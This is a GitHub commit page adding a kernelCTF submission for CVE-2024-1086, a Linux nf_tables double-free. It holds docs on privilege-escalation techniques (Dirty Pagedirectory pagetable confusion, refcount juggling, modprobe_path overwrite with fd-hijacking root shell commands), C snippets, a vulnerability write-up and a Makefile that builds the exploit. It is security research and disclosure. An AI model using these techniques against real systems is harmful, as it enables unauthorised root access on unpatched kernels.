Skip to content

Commit

Permalink
kernelCTF: added CVE-2024-1086 lts mitigation (#96)
Browse files Browse the repository at this point in the history
* kernelCTF: added CVE-2024-1086 lts mitigation

* fix: musl-tools added

* fix: trying apt update to fix include issue?

* fix: tred fixing includes replacing musl-gcc with gcc. stability concerns?

* fix: reversed previous commit. invalid AVX512 instructions

* fix: tried including -mno-avx512f

* fix: tried replacing musl-gcc with gcc

* fix: reverse previous -mno-avx512f commit (it does not fix static glibc/ld/etc)

* fix: attempted fix by inversing include dirs, and added debug statements

* fix: added debug statements

* fix: added more debuig

* fix: added header files

* fix: added UAPI header files for lts

* fix: removed debug statements

* CVE-2024-1086: added more info to exploit (still incomplete)

* fix: completed exploit.md

* docs: added abbreviations for diagram

* docs: added references in code snippet

* docs: explained ip struct values in detail

* docs: included link to blogpost

* docs: fixed PUD pagetable layer nr

* docs: improved documentation for dirty pagetable technique

* docs: changed paths to external repo to relative path in repo

* Update novel-techniques.md

* test: kernelctf gcc static compile

* test: added libmnl-dev dependency for header

* fix: added libnftnl headers to dependencies

* test: switched to using apt installed headers

* fix: include header path

* fix: changed include path order

* fix: include with incorrect header paths

* fix: linux header include path

* chore: got rid of header bomb lol

* fix: asm headers

* fix: asm-generic headers (please let this be the last)

* fix: asm headers

* fix: got rid of header nuke

* chore: got rid of header nuke for real this time
  • Loading branch information
Notselwyn authored Sep 12, 2024
1 parent c0eac50 commit d35192a
Show file tree
Hide file tree
Showing 39 changed files with 5,870 additions and 0 deletions.
721 changes: 721 additions & 0 deletions pocs/linux/kernelctf/CVE-2024-1086_lts_mitigation/docs/exploit.md

Large diffs are not rendered by default.

Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Original file line number Diff line number Diff line change
@@ -0,0 +1,203 @@
# novel-techniques

## Bypassing KernelCTF mitigation instance corruption checks for skb's

One of the mitigations in the KernelCTF Mitigation instance is checking the freelist next pointer when allocating an object through a freelist pointer.

In the exploit, the following happens when doing the double-free:
1. alloc skb1
2. free skb1 (set new freelist pointer)
3. modify skb->len (overlapping with freelist next pointer)
4. free skb1 (set new freelist pointer)

This means upon step 3 the freelist next pointer gets corrupted. `CONFIG_FREELIST_HARDENED` is excluded here for demonstration purposes. When the background applications in the system try to transmit packets, they will inevitably try to allocate the skb object with the corrupted freelist next pointer, causing a system crash.

To bypass this, we leverage the fact that these corruption checks only happen on allocation, not on free. Hence, we can mask the corrupted object by spraying "healthy" objects which can be allocated instead. Hence, it would look like this:

1. alloc N skb objects
2. alloc skb1
3. free skb1 (set new freelist pointer)
4. modify skb->len (overlapping with freelist next pointer)
5. free N skb objects
6. free skb1 (set new freelist pointer)

Whilst this is probably not the vulnerability which freelist next pointer corruption detection is intended to mitigate, it would definitively mitigate exploiting this specific scenario.

The fix for this technique would be checking the freelist next pointer of the previous object in the freelist when freeing an object.


## Dirty Pagedirectory (pagetable confusion)

Perhaps the most interesting technique in this exploit is Dirty Pagedirectory: plainly put, pagetable confusion between pagetables like PUD+PMD and PMD+PTE.

By overlapping an PUD page and PMD page (PUD+PMD), or an PMD page and a PTE page (PMD+PTE), we can set pagetable entries from userland pages. This allows for a *very* powerful primitive allowing the exploit to do rapid memory read/writes across all physical memory of the system.

> Note: it does **not** make use of recursion, as (in case of PUD+PMD) the PMD is not the child of the overlapped PUD, but is the child of a normal, arbitrary PUD.
Note how PT entries not only include the physical address (PFN), but also the page flags. Hence, we can write to read-only pages like modprobe_path. As if that isn't enough, we can set the target area to 1GiB (PMD+PTE) and/or 512GiB (PUD+PMD) addresses at the same time. Ofcourse, this can be limited to save memory usage and overhead.

In the blogpost, this diagram tries to describe it:

![Dirty Pagedirectory diagram showing the relations between different pagetable layers in an exploit](https://pwning.tech/content/images/2024/03/dirtypagedirectory.svg)


## Freeing skb's instantly on arbitrary CPUs without UDP/TCP stacks

In order to bypass certain double-free detections, we need to free skb's on specific timings on specific CPUs. Additionally, we cannot make use of the UDP and TCP stacks in the kernel, since they access (due to double-free) corrupted fields in the skb.

Fortunately, we can do this with the IPv4 fragment queues (IFQs). By sending an IPv4 fragment to localhost, we make it wait `ipfrag_time` seconds until all fragments are freed. Alternatively, it gets freed when the IFQ is completed (i.e. the target length is reached with the fragments in the IFQ).

If needed, we can prolong the lifetime of the IFQ by writing to `/proc/sys/net/ipv4/ipfrag_time`.

Unfortunately, the target length of the IFQ is depending on skb->len, which is corrupted by the double-free. Hence, we need to do this by triggering an error in the IFQ code, causing it to free all fragments in the queue on the CPU handling the triggering skb.

It looks like this in action with the double-free:
1. alloc skb1 (double-freed IPv4 fragment) @ CPU `X`
2. free skb1 (1) @ CPU `X`
3. make skb1 go into IFQ (utilizing its' content)
4. do stuff here, like spraying skb's, spraying PTEs, etc
5. alloc skb2 (errornous IPv4 fragment) @ CPU `Y`
6. free skb2 @ CPU `Y`
7. free skb1 @ CPU `Y`

## Fileless privesc using fd hijacking

We can escape the namespace by doing file descriptor hijacking: hooking up the file descriptors of another process (or `/dev/console`) to the `/bin/sh` instance as root triggered by the `modprobe_path` technique.

For example:
- hijack `/dev/console` (works only on local TTYs): `/bin/sh 0</dev/console 1>/dev/console 2>&1`
- hijack exploit fd's (works on reverse shells as well): `/bin/sh 0</proc/<exploit_pid>/fd/0 1>/proc/<exploit_pid>/fd/1 2>&1`

This way we can do fileless privesc and escape the namespace without even writing a single file, allowing for privesc on read-only systems.

## Fileless privesc using modprobe_path + procfs

We can combine overwriting `modprobe_path` with procfs to allow for fileless privesc script execution as root from the root namespace. With this primitive, we can utilize fd hijacking to perform fileless namespace escapes.

We can overwrite `modprobe_path` to `/proc/<exploit_pid>/fd/<privesc_script_fd>` and it will execute the privesc script completely from memory, allowing privesc on read-only systems.

## TLB flushing with PCID enabled

One of the things required for Dirty Pagedirectory is a working TLB flushing primitive. Assuming the target VMA is shared, we can fork() and munmap() that VMA in the child. This allows for 100% working TLB flushing regardless of PCID, without altering the original pagetables. I presume the CPU needs to be pinned, to avoid flushing an incorrect CPU core's TLB cache.

The code for this looks like:

```c
#define SPINLOCK(cmp) while (cmp) { usleep(10 * 1000); }

// presumably needs to be CPU pinned
static void flush_tlb(void *addr, size_t len)
{
short *status;

status = mmap(NULL, sizeof(short), PROT_READ | PROT_WRITE, MAP_SHARED | MAP_ANONYMOUS, -1, 0);

*status = FLUSH_STAT_INPROGRESS;
if (fork() == 0)
{
munmap(addr, len);
*status = FLUSH_STAT_DONE;
sleep(9999);
}

SPINLOCK(*status == FLUSH_STAT_INPROGRESS);

munmap(status, sizeof(short));
}
```
Note that the child sleeps instead of exits, to avoid certain kernel bugs when doing dirty pagedirectory.
## Easing physical KASLR bruteforce
It is possible to ease physical KASLR bruteforcing. The Linux kernel base is aligned to `CONFIG_PHYSICAL_START` (and/or `CONFIG_PHYSICAL_ALIGN`) bytes. This essentially means the Linux kernel must be aligned to 16MiB or 2MiB, reducing the amount of possible base addresses from e.g. 8GiB addresses (assuming 8GiB physical memory) to 512 addresses (a bruteforcable amount).
## Validating the correct modprobe_path
We can validate if we found the correct `modprobe_path` object in physical memory (when using Dirty Pagedirectory), by checking if the output of `/proc/sys/kernel/modprobe` has changed to the new value, since it is a "real-time" reference to the `modprobe_path` object used in the kernel.
For example, this can be done with:
```c
static int get_modprobe_path(char *buf, size_t buflen)
{
int size;
size = read_file("/proc/sys/kernel/modprobe", buf, buflen);
if (size == buflen)
printf("[*] ==== read max amount of modprobe_path bytes, perhaps increment KMOD_PATH_LEN? ====\n");
// remove \x0a
buf[size-1] = '\x00';
return size;
}
static int strcmp_modprobe_path(char *new_str)
{
char buf[KMOD_PATH_LEN] = { '\x00' };
get_modprobe_path(buf, KMOD_PATH_LEN);
return strncmp(new_str, buf, KMOD_PATH_LEN);
}
void *memmem_modprobe_path(void *haystack_virt, size_t haystack_len, char *modprobe_path_str, size_t modprobe_path_len)
{
void *pmd_modprobe_addr;
// search 0x200000 bytes (a full PTE at a time) for the modprobe_path signature
pmd_modprobe_addr = memmem(haystack_virt, haystack_len, modprobe_path_str, modprobe_path_len);
if (pmd_modprobe_addr == NULL)
return NULL;
// check if this is the actual modprobe by overwriting it, and checking /proc/sys/kernel/modprobe
strcpy(pmd_modprobe_addr, "/sanitycheck");
if (strcmp_modprobe_path("/sanitycheck") != 0)
{
printf("[-] ^false positive. skipping to next one\n");
return NULL;
}
return pmd_modprobe_addr;
}
```

## Page refcount juggling

When freeing a page, the Linux kernel checks if the pages' refcount is 0. If it is not, it will refuse to free the page. To bypass this behaviour we simply juggle the refcounts, by utilizing the following order of operations for the double-free:

1. alloc obj1 | refcount 0 -> 1
2. free obj1 | refcount 1 -> 0
3. alloc obj2 | refcount 0 -> 1
4. free obj1 | refcount 1 -> 0
5. alloc obj3 | refcount 0 -> 1

obj2 and obj3 will now be overlapping (having the same page), because the refcounts were always 0 when freeing.

```c
void __free_pages(struct page *page, unsigned int order)
{
/* get PageHead before we drop reference */
int head = PageHead(page);

if (put_page_testzero(page))
free_the_page(page, order);
else if (!head)
while (order-- > 0)
free_the_page(page + (1 << order), order);
}
```
## Double-free order 4 to order 0 (old: race condition)
When double-freeing pages, we can convert the page order to 0 utilizing a race condition with a `WARN()` message on really slow systems (like QEMU VMs with synchronous terminals). In the new exploit, this has been replaced with PCP draining as this works on all systems.
This allows us to double-allocate `order==0` pages whilst having a double-free primitive on `order==4` pages.
## Double-free order X to order Y (new: PCP refill)
When double-freeing pages, we can convert the page order to an arbitrary order by double-freeing pages with `order>=4` such that it will end up in the buddy allocator freelist. Then, we can allocate it to the PCP list of an arbitrary `order<=3` page freelist, by draining said PCP-freelist and refilling it with the pages from the buddy-freelist.
This is the new variant of the race condition-based method.
Original file line number Diff line number Diff line change
@@ -0,0 +1,47 @@
# vulnerability

Document containing information about the vulnerability, the requirements, and the affected Linux kernel versions.

## technical details

### outlines

The root cause is an input sanitization bug in `nft_verdict_init()` (`net/netfilter/nf_tables_api.c:9814`), which allowed rule verdicts to return positive drop errors. This is classified as CVE-2024-1086.

The impact of this is a stable double-free primitive on both `struct sk_buff` objects, as well as `sk_buff->head` objects (kmalloc objects, ranging from size 256 to 65536 (assuming ipv4) a.k.a. order 4 buddy pages).

The fix for the vulnerability was simply disallowing all drop errors in `nft_verdict_init()`, as this wouldn't allow userland applications to provide any drop errors anymore. It did not make sense to the kernel developers that userland applications could do this anyways, so hence they fully disabled it.

### triggering the bug

An exploit can create a rule containing an expression which sets the verdict to `0xFFFF0000`.

When this rule gets evaluated for an skb passing the nf_tables firewall, `nf_hook_slow()` attempts to free an skb object because `NF_DROP` is returned from the verdict mask of the rule verdict (`0xFFFF0000 (verdict) & 0x000000ff (NF_VERDICT_MASK) == 0 (NF_DROP)`). Then, `nf_hook_slow()` returns `NF_ACCEPT` (`NF_DROP_GETERR(0xFFFF0000) == NF_ACCEPT`) as if every hook/rule in the chain returned `NF_ACCEPT`.

This causes the caller of `nf_hook_slow()` to misinterpret the situation (it believes the packet has not been freed, and should be handled), and continue parsing the packet and eventually double-free both the skb object and its skb->head object.

## requirements

Capabilities:
- `CAP_NET_ADMIN`

Kernel configuration:
- `CONFIG_NF_TABLES=y`
- `CONFIG_NETFILTER=y`

User namespaces needed:
- Yes, in order to setup rules for nf_tables to trigger the bug (`CAP_NET_ADMIN` in the current namespace should also be enough)

## version info

Commit which introduced the vuln:
- https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=e0abdadcc6e113ed2e22c85b35007

Commit which fixed the vuln (revert of previous commit):
- https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=f342de4e2f33e0e39165d8639387aa6c19dff660

Affected kernel versions:
- everything between `v3.5` and `v6.8-rc1`
- excluding `v6.1.76` and higher on `v6.1.x`
- excluding `v6.6.15` and higher on `v6.6.x`
- excluding `v6.7.3` and higher on `v6.7.x`
Original file line number Diff line number Diff line change
@@ -0,0 +1,42 @@
SRC_FILES := src/exploit.c src/env.c src/net.c src/nftnl.c src/file.c
OUT_NAME = ./exploit

# use musl-gcc since statically linking glibc with gcc generated invalid opcodes for qemu
# and dynamically linking raised glibc ABI versioning errors
CC = musl-gcc

CFLAGS = -I./include -Wall -Wno-deprecated-declarations

# use custom object archives compiled with musl-gcc for compatibility. normal ones
# are used with gcc and have _chk funcs which musl doesn't support
# - ./include/libmnl: libmnl v1.0.5
# - ./include/libnftnl: libnftnl v1.2.6
LIBMNL_PATH = ./lib/libmnl.a
LIBNFTNL_PATH = ./lib/libnftnl.a

exploit: _compile_static _strip_bin
prerequisites: _install_musl _install_headers
run: _run_outfile
clean: _clean_outfile

_install_headers:
sudo apt-get install libmnl-dev libnftnl-dev

# incredibly cursed way to manage musl-gcc include paths (by doing -I/usr/include I got errors like <bits/wordsize.h> not being found)
mkdir include
ln -s /usr/include/libnftnl ./include/libnftnl
ln -s /usr/include/libmnl ./include/libmnl
ln -s /usr/include/linux ./include/linux
ln -s /usr/include/x86_64-linux-gnu/asm ./include/asm
ln -s /usr/include/asm-generic ./include/asm-generic

_install_musl:
sudo apt-get install musl-tools
_compile_static:
$(CC) $(CFLAGS) $(SRC_FILES) -o $(OUT_NAME) -static $(LIBNFTNL_PATH) $(LIBMNL_PATH)
_strip_bin:
strip $(OUT_NAME)
_run_outfile:
$(OUT_NAME)
_clean_outfile:
rm $(OUT_NAME)
Binary file not shown.
Loading

0 comments on commit d35192a

Please sign in to comment.